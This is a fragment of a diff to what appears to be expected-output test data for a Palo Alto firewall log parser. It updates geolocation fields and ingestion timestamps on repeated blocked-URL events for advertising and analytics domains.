"2018-11-30T16:44:58.000-05:00", "timezone": "America/New_York", @@ -6623,22 +6433,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -6769,7 +6574,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691877600Z", + "ingested": "2021-12-14T14:50:40.980250980Z", "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28299,1,53094,443,12496,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7771,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:58.000-05:00", "timezone": "America/New_York", @@ -6797,22 +6602,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -6943,7 +6743,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691883900Z", + "ingested": "2021-12-14T14:50:40.980251325Z", "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28303,1,53095,443,17029,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7772,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:58.000-05:00", "timezone": "America/New_York", @@ -6971,22 +6771,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -7117,7 +6912,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691888200Z", + "ingested": "2021-12-14T14:50:40.980251670Z", "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28390,1,53096,443,23696,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7773,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:58.000-05:00", "timezone": "America/New_York", @@ -7145,22 +6940,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -7291,7 +7081,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691893300Z", + "ingested": "2021-12-14T14:50:40.980252017Z", "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28433,1,53097,443,34769,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7774,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:59.000-05:00", "timezone": "America/New_York", @@ -7319,22 +7109,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -7465,7 +7250,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691898900Z", + "ingested": "2021-12-14T14:50:40.980252373Z", "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28380,1,53099,443,22486,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7775,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:59.000-05:00", "timezone": "America/New_York", @@ -7493,22 +7278,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -7639,7 +7419,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691904200Z", + "ingested": "2021-12-14T14:50:40.980252760Z", "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:44:59,012801096514,THREAT,url,2049,2018/11/30 16:44:59,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:59,28363,1,53100,443,12894,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7776,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:59.000-05:00", "timezone": "America/New_York", @@ -7667,22 +7447,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -7813,7 +7588,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691908400Z", + "ingested": "2021-12-14T14:50:40.980253095Z", "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28349,1,53101,443,62348,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7777,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", @@ -7841,22 +7616,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -7987,7 +7757,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691913400Z", + "ingested": "2021-12-14T14:50:40.980253440Z", "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28411,1,53104,443,6224,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7778,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", @@ -8015,22 +7785,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -8161,7 +7926,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691919900Z", + "ingested": "2021-12-14T14:50:40.980253794Z", "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28397,1,53107,443,44120,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7779,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", @@ -8189,22 +7954,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -8335,7 +8095,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691924600Z", + "ingested": "2021-12-14T14:50:40.980254131Z", "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28347,1,53108,443,44228,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7780,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", @@ -8363,22 +8123,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -8509,7 +8264,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691929300Z", + "ingested": "2021-12-14T14:50:40.980254478Z", "original": "Nov 30 16:45:00 PA-220 1,2018/11/30 16:45:00,012801096514,THREAT,url,2049,2018/11/30 16:45:00,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:00,28443,1,53109,443,31322,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7781,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:00.000-05:00", "timezone": "America/New_York", @@ -8537,22 +8292,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -8683,7 +8433,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691934100Z", + "ingested": "2021-12-14T14:50:40.980254828Z", "original": "Nov 30 16:45:14 PA-220 1,2018/11/30 16:45:13,012801096514,THREAT,url,2049,2018/11/30 16:45:13,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:13,28439,1,53118,443,1672,443,0x403000,tcp,block-url,\"www.googleadservices.com/\",(9999),business-and-economy,informational,client-to-server,7782,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:13.000-05:00", "timezone": "America/New_York", @@ -8711,22 +8461,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -8857,7 +8602,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691939100Z", + "ingested": "2021-12-14T14:50:40.980255267Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,25958,1,53126,443,20801,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7783,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:15.000-05:00", "timezone": "America/New_York", @@ -8885,22 +8630,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -9031,7 +8771,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691944200Z", + "ingested": "2021-12-14T14:50:40.980255617Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28429,1,53127,443,24533,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7784,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:15.000-05:00", "timezone": "America/New_York", @@ -9059,22 +8799,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -9205,7 +8940,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691950600Z", + "ingested": "2021-12-14T14:50:40.980255966Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28465,1,53128,443,30150,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7785,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:15.000-05:00", "timezone": "America/New_York", @@ -9233,22 +8968,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -9379,7 +9109,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691957100Z", + "ingested": "2021-12-14T14:50:40.980256374Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:15,012801096514,THREAT,url,2049,2018/11/30 16:45:15,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:15,28504,1,53129,443,36305,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7786,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:15.000-05:00", "timezone": "America/New_York", @@ -9407,22 +9137,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -9553,7 +9278,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691963500Z", + "ingested": "2021-12-14T14:50:40.980256788Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28458,1,53130,443,42682,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7787,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", @@ -9581,22 +9306,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -9727,7 +9447,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691969800Z", + "ingested": "2021-12-14T14:50:40.980257168Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28491,1,53131,443,22530,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7788,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", @@ -9755,22 +9475,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -9901,7 +9616,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691976100Z", + "ingested": "2021-12-14T14:50:40.980257517Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28520,1,53132,443,43713,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7789,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", @@ -9929,22 +9644,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -10075,7 +9785,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691982300Z", + "ingested": "2021-12-14T14:50:40.980257861Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28335,1,53133,443,60608,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7790,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", @@ -10103,22 +9813,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -10249,7 +9954,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691988700Z", + "ingested": "2021-12-14T14:50:40.980258218Z", "original": "Nov 30 16:45:16 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28414,1,53134,443,9302,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7791,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", @@ -10277,22 +9982,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -10423,7 +10123,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691995100Z", + "ingested": "2021-12-14T14:50:40.980258555Z", "original": "Nov 30 16:45:17 PA-220 1,2018/11/30 16:45:16,012801096514,THREAT,url,2049,2018/11/30 16:45:16,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:45:16,28488,1,53135,443,11634,443,0x403000,tcp,block-url,\"service.maxymiser.net/\",(9999),business-and-economy,informational,client-to-server,7792,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:45:16.000-05:00", "timezone": "America/New_York", @@ -10451,22 +10151,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", 